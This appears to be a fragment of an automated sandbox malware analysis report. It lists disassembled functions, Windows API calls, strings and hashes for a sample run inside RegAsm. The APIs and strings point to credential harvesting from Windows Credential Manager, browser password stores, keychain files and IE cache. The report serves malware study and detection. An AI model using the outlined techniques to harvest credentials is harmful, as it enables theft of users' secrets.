41fbf1 37756->37760 37770 41ee26 37757->37770 37761 41fc39 37760->37761 37780 4446ce 11 API calls 37760->37780 37761->37725 37766 41fd5e 37761->37766 37763 41ee6b 85 API calls 37762->37763 37764 41fc5d 37763->37764 37764->37730 37765->37726 37768 41fd65 37766->37768 37767 41fdab 37767->37725 37768->37767 37769 41fbdb 85 API calls 37768->37769 37769->37768 37771 41ee41 37770->37771 37772 41ee32 37770->37772 37781 41edad 37771->37781 37784 4446ce 11 API calls 37772->37784 37775 41ee3c 37775->37760 37778 41ee58 37778->37775 37786 41ee6b 37778->37786 37780->37761 37790 41be52 37781->37790 37784->37775 37785 41eb85 11 API calls 37785->37778 37787 41ee70 37786->37787 37788 41ee78 37786->37788 37846 41bf99 85 API calls 37787->37846 37788->37775 37791 41be6f 37790->37791 37792 41be5f 37790->37792 37798 41be8c 37791->37798 37811 418c63 37791->37811 37825 4446ce 11 API calls 37792->37825 37794 41be69 37794->37775 37794->37785 37796 41bee7 37796->37794 37829 41a453 85 API calls 37796->37829 37798->37794 37798->37796 37799 41bf3a 37798->37799 37800 41bed1 37798->37800 37828 4446ce 11 API calls 37799->37828 37802 41bef0 37800->37802 37805 41bee2 37800->37805 37802->37796 37803 41bf01 37802->37803 37804 41bf24 memset 37803->37804 37807 41bf14 37803->37807 37826 418a6d memset memcpy memset 37803->37826 37804->37794 37815 41ac13 37805->37815 37827 41a223 memset memcpy memset 37807->37827 37810 41bf20 37810->37804 37814 418c72 37811->37814 37812 418c94 37812->37798 37813 418d51 memset memset 37813->37812 37814->37812 37814->37813 37816 41ac52 37815->37816 37817 41ac3f memset 37815->37817 37820 41ac6a 37816->37820 37830 41dc14 19 API calls 37816->37830 37818 41acd9 37817->37818 37818->37796 37822 41aca1 37820->37822 37831 41519d 37820->37831 37822->37818 37823 41acc0 memset 37822->37823 37824 41accd memcpy 37822->37824 37823->37818 37824->37818 37825->37794 37826->37807 37827->37810 37828->37796 37830->37820 37834 4175ed 37831->37834 37842 417570 SetFilePointer 37834->37842 37837 41760a ReadFile 37838 417637 37837->37838 37839 417627 GetLastError 37837->37839 37840 4151b3 37838->37840 37841 41763e memset 37838->37841 37839->37840 37840->37822 37841->37840 37843 4175b2 37842->37843 37844 41759c GetLastError 37842->37844 37843->37837 37843->37840 37844->37843 37845 4175a8 GetLastError 37844->37845 37845->37843 37846->37788 37847 417bc5 37849 417c61 37847->37849 37852 417bda 37847->37852 37848 417bf6 UnmapViewOfFile CloseHandle 37848->37848 37848->37852 37851 417c2c 37851->37852 37859 41851e 18 API calls 37851->37859 37852->37848 37852->37849 37852->37851 37854 4175b7 37852->37854 37855 4175d6 FindCloseChangeNotification 37854->37855 37856 4175c8 37855->37856 37857 4175df 37855->37857 37856->37857 37858 4175ce Sleep 37856->37858 37857->37852 37858->37855 37859->37851 40439 4147f3 40442 414561 40439->40442 40441 414813 40443 41456d 40442->40443 40444 41457f GetPrivateProfileIntW 40442->40444 40447 4143f1 memset _itow WritePrivateProfileStringW 40443->40447 40444->40441 40446 41457a 40446->40441 40447->40446

                                                          Executed Functions

                                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                          APIs
                                                          • memset.MSVCRT ref: 0040DDAD
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                          • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                          • memset.MSVCRT ref: 0040DF5F
                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                          • API String ID: 594330280-3398334509
                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                          • String ID:
                                                          • API String ID: 2947809556-0
                                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileFind$FirstNext
                                                          • String ID:
                                                          • API String ID: 1690352074-0
                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0041898C
                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: InfoSystemmemset
                                                          • String ID:
                                                          • API String ID: 3558857096-0
                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 73 445685 21->73 74 4456b2-4456b5 call 40b1ab 21->74 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 78 445fae-445fb2 63->78 79 445d2b-445d3b 63->79 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 87 445884-44589d call 40a9b5 call 4087b3 68->87 249 445c77 69->249 70->69 88 445ba2-445bcf call 4099c6 call 445403 call 445389 70->88 142 445849 71->142 90 44568b-4456a4 call 40a9b5 call 4087b3 73->90 108 4456ba-4456c4 74->108 95 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 79->95 96 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 79->96 146 44589f 87->146 88->54 148 4456a9-4456b0 90->148 165 445d67-445d6c 95->165 166 445d71-445d83 call 445093 95->166 196 445e17 96->196 197 445e1e-445e25 96->197 122 4457f9 108->122 123 4456ca-4456d3 call 413cfa call 413d4c 108->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 139->140 140->23 142->56 146->67 148->74 148->90 154->108 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->78 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->78 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->78 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->207 264 4457cc-4457e5 call 4087b3 248->264 249->54 253->176 264->207 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                          APIs
                                                          • memset.MSVCRT ref: 004455C2
                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                          • memset.MSVCRT ref: 0044570D
                                                          • memset.MSVCRT ref: 00445725
                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                          • memset.MSVCRT ref: 0044573D
                                                          • memset.MSVCRT ref: 00445755
                                                          • memset.MSVCRT ref: 004458CB
                                                          • memset.MSVCRT ref: 004458E3
                                                          • memset.MSVCRT ref: 0044596E
                                                          • memset.MSVCRT ref: 00445A10
                                                          • memset.MSVCRT ref: 00445A28
                                                          • memset.MSVCRT ref: 00445AC6
                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                          • memset.MSVCRT ref: 00445B52
                                                          • memset.MSVCRT ref: 00445B6A
                                                          • memset.MSVCRT ref: 00445C9B
                                                          • memset.MSVCRT ref: 00445CB3
                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                          • memset.MSVCRT ref: 00445B82
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                          • memset.MSVCRT ref: 00445986
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                          • API String ID: 2745753283-3798722523
                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                          Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                          • String ID: $/deleteregkey$/savelangfile
                                                          • API String ID: 2744995895-28296030
                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                          Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                          • memset.MSVCRT ref: 0040B756
                                                          • memset.MSVCRT ref: 0040B7F5
                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                          • memset.MSVCRT ref: 0040B851
                                                          • memset.MSVCRT ref: 0040B8CA
                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                          • memset.MSVCRT ref: 0040BB53
                                                          • memcpy.MSVCRT ref: 0040BB66
                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Freewcsrchr$AddressChangeCloseCreateFileFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                          • String ID: chp$v10
                                                          • API String ID: 824451583-2783969131
                                                          • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                          • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f ??3@YAXPAX@Z 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                          APIs
                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                          • memset.MSVCRT ref: 0040E380
                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                          • memcpy.MSVCRT ref: 0040E3EC
                                                          • memcpy.MSVCRT ref: 0040E407
                                                          • memcpy.MSVCRT ref: 0040E422
                                                          • memcpy.MSVCRT ref: 0040E43D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                          • API String ID: 3073804840-2252543386
                                                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
